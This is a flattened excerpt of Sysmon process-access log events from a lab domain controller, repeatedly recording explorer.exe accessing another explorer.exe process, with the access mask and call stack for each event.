16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 